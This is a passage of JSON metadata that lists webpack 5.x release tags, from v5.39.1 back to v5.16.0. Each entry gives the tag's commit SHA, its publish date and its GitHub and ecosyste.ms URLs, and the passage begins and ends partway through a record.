f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"